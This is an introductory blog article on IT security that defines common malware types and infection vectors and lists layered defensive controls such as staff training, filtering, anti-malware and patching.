IT Security 101: Malware

Written By Jason Minor

Introduction

In this installment of ITSEC101, I will provide an overview of malware. This is a continuation of the the previous discussion on threats and threat actors.

I’ll provide a definition and take a look at different types of malware, and how a system becomes infected. Then I’ll provide common defenses, which go beyond simply deploying ant-virus.

Malware

Malware refers to software, firmware, code and scripts that are used for malicious activity. The purpose and impact of malware can very, which gives rise to its subcategories. Note that these categories are not strict. They simply define different capabilities and a single piece of malware can display traits from multiple categories.

Before I dive into the subcategories, I want to discuss three types of software that are not necessarily malware, but are important for a defender to understand. Software in these categories are generally benign, but are unnecessary, and may open a system to vulnerabilities and attack vectors, or simply take up resources. In general, they should be identified and removed, and steps should be taken to avoid their reinstallation.

Potentially Unwanted Program (PUP)

This term describes software that is flagged by anti-malware systems as potentially malicious or simply unnecessary.

Bloatware

This term describes software that comes preinstalled on some systems by vendors that is often redundant or unnecessary. Some cell phone service providers are notorious for selling lower-end cell phones full of their own versions of common apps.

Adware

This term describes software that has the sole purpose of providing pop-up ads and redirecting users to products and services. It can be considered malware, as it often installs itself without the user’s knowledge, is misleading in its purpose, comes unknowingly packaged with other software, and often hijacks the home page, search pages, and search bars of browsers. However, the redirections are not necessarily always malicious.

Virus

This term describes malicious software that “infects” other programs. It executes when the infected file is executed. It is capable of corrupting, stealing and deleting data.

Worm

This term describes malicious software that can replicate itself to spread throughout a network. Unlike a virus, it does not require a “host” program and can execute on its own. I can even exploit vulnerabilities in its attempt to spread.

Trojan

This term describes malicious software that poses as legitimate software. It is capable of corrupting, stealing and deleting data.

Ransomware

This term describes malicious software that encrypts data on a system, and demands payment in order to obtain a decryption key. It can also be destructive, with no ransom demand.

Spyware

This term describes malicious software that monitors user activity and steals sensitive data.

Rootkits

This term describes malicious software that grants administrative control over a system. It is often persistent and stealthy.

Keyloggers

This term describes malicious software similar to spyware, but specifically refers to the capturing of keystrokes to spy on user activity or steal sensitive information.

Botnets

This term describes malicious software that resides in a network of devices capable of simultaneous communication and attack.

Fileless

This term refers to malicious software that resides in memory, or leverages existing tools to maintain persistence without a trace.

Backdoor

This term refers to malicious software that created covert entry into a system.

Cryptojacker

This term refers to malicious software that targets crypto wallets and exchanges to steal cryptocurrency.

Scareware

This term refers to malicious software that uses fear to manipulate a user into installing actual malware, or contacting a malicious actor, by pretending that the user’s machine is already infected. It will present links to malicious sites, or contact information for bad actors posing as support specialists.

Polymorphic

This term refers to malicious software that is able to replica itself in such a way as to avoid detection. By changing parts of its code, or encrypting and decrypting code at execution, the malware can change its hash value, thereby outsmarting systems that rely on validating file hashes against databases of known malware.

AI-Powered

This term refers to malicious software that is developed using artificial intelligence, and may have the ability to change its tactics by reacting to defenses.

Threat Vectors

Malware can find its way onto a system through many paths.

World Wide Web (WWW) - A user might accidentally navigate to a site that hosts malicious files and download malware, believing it to be legitimate software. It is also possible that a malicious website contains deployment scripts for silent downloads.

USB - Malware can spread between devices. USB-connected devices can contain malware able to infect connected hosts, or simply be copied by a user either intentionally or unintentionally.

Email - Malicious actors may send targeted, or blanketed, emails that contain malware in attachments, or links to malware hosting sites.

Supply-Chain - Malicious actors might insert themselves into the supply chain, and infect devices or compromise software thought to be from a trusted and verified source before it reaches a user.

Physical Access - A malicious actor with physical access to a system can install malware.

Remote Access - A malicious actor with remote access to a system can install malware.

System to System - Interconnected hosts can allow for the spread of malware.

Man-in-the-Middle - A malicious actor might insert themselves or a rogue device physically or logically between a user and the service the user is intending to use.

Defenses

There are many potential points of defense to prevent malware from reaching a system, but there are no guaranteed methods. So, a multi-layered approach should be taken, and include controls not just for prevention, but also for identification, remediation and recovery in the event of a malware infection. Controls should be risk-based and depend on the specifics of the situation.

Note: Before taking any actions on identified malware, it is important to review findings for false-positives.

  • Train staff on safe practices when using email and the web.

  • Train staff on how to identify and report malicious emails.

  • Train staff on how to identify and report malware infections.

  • Implement firewall policies, or other URL/DNS filtering systems, to block users from accessing malicious websites and sites that provide unofficial software downloads.

  • Implement application control systems and processes to manage the distribution and installation of software from known good sources.

  • Remove administrative rights from being used in daily activities, and allow only authorized, qualified IT staff the ability to install software.

  • Implement anti-malware software on all endpoints, and enable real-time and on-demand anti-malware scans. Implement policies to block the installation of software based on file types, names, paths and hashes. Consider automatic actions such as removal and quarantine.

  • Implement proactive anti-malware policies on next-gen firewalls and in email security systems that block specific file types, names, paths and hashes from being downloaded.

  • Implement anti-malware software on all endpoints, and enable real-time and on-demand anti-malware scans, and consider automatic actions such as removal and quarantine.

  • Develop playbooks for IT staff and responders on proper identification, removal and recovery.

  • Remove any malicious, unwanted or unnecessary software found in the environment.

  • Keep systems and applications up to date with the latest patches.

  • Harden systems by disabling unnecessary ports and services.

  • Implement network scans and physical walk-throughs to identify rogue devices.

  • Codify all controls with policy, procedure, standards and guidelines.

Conclusion

Malware is a common tool used by threat actors to gain access, disrupt systems and steal information, and defending against it requires a layered approach. Reliance on outmoded anti-virus systems is not enough to protect against the latest advancements in malware. With capabilities such as fileless infection, polymorphism, and the growing use of AI, mixed with the ever evolving tactics of threat actors, malware is becoming much harder to defend against. It is important to stay vigilant, validate controls, and be aware of the latest threats.

Daily Cuppa

Today’s cup of tea is a refreshing Organic Earl Grey provided by Equal Exchange. Organic, fair trade, and full of flavor. It makes for the perfect start to the work day.

If you found this article useful, or enjoy the site in general, feel free to buy the author a cup of tea.
The author is also available for work.

Jason Minor
Previous

Free Cybersecurity Tools for IT Security Pros
Next

Fun with Python: File Hashing